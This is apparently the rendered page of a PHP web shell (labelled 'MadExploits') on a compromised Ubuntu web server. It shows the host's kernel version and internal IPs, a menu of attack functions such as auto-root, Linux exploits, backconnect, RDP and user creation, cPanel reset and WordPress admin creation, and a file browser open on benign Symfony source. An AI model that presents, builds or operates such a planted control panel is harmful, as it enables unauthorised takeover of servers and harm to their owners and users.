Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
Symfony /
Component /
Config /
Resource /
[ HOME SHELL ]
Name
Size
Permission
Action
ClassExistenceResource.php
6.89
KB
-rw-r--r--
ComposerResource.php
1.55
KB
-rw-r--r--
DirectoryResource.php
2.64
KB
-rw-r--r--
FileExistenceResource.php
1.22
KB
-rw-r--r--
FileResource.php
1.45
KB
-rw-r--r--
GlobResource.php
7.47
KB
-rw-r--r--
ReflectionClassResource.php
9.06
KB
-rw-r--r--
ResourceInterface.php
956
B
-rw-r--r--
SelfCheckingResourceChecker.ph...
1.34
KB
-rw-r--r--
SelfCheckingResourceInterface....
779
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ComposerResource.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config\Resource; /** * ComposerResource tracks the PHP version and Composer dependencies. * * @author Nicolas Grekas <p@tchwork.com> * * @final */ class ComposerResource implements SelfCheckingResourceInterface { private $vendors; private static $runtimeVendors; public function __construct() { self::refresh(); $this->vendors = self::$runtimeVendors; } public function getVendors(): array { return array_keys($this->vendors); } public function __toString(): string { return __CLASS__; } /** * {@inheritdoc} */ public function isFresh(int $timestamp): bool { self::refresh(); return array_values(self::$runtimeVendors) === array_values($this->vendors); } private static function refresh() { self::$runtimeVendors = []; foreach (get_declared_classes() as $class) { if ('C' === $class[0] && str_starts_with($class, 'ComposerAutoloaderInit')) { $r = new \ReflectionClass($class); $v = \dirname($r->getFileName(), 2); if (is_file($v.'/composer/installed.json')) { self::$runtimeVendors[$v] = @filemtime($v.'/composer/installed.json'); } } } } }
Close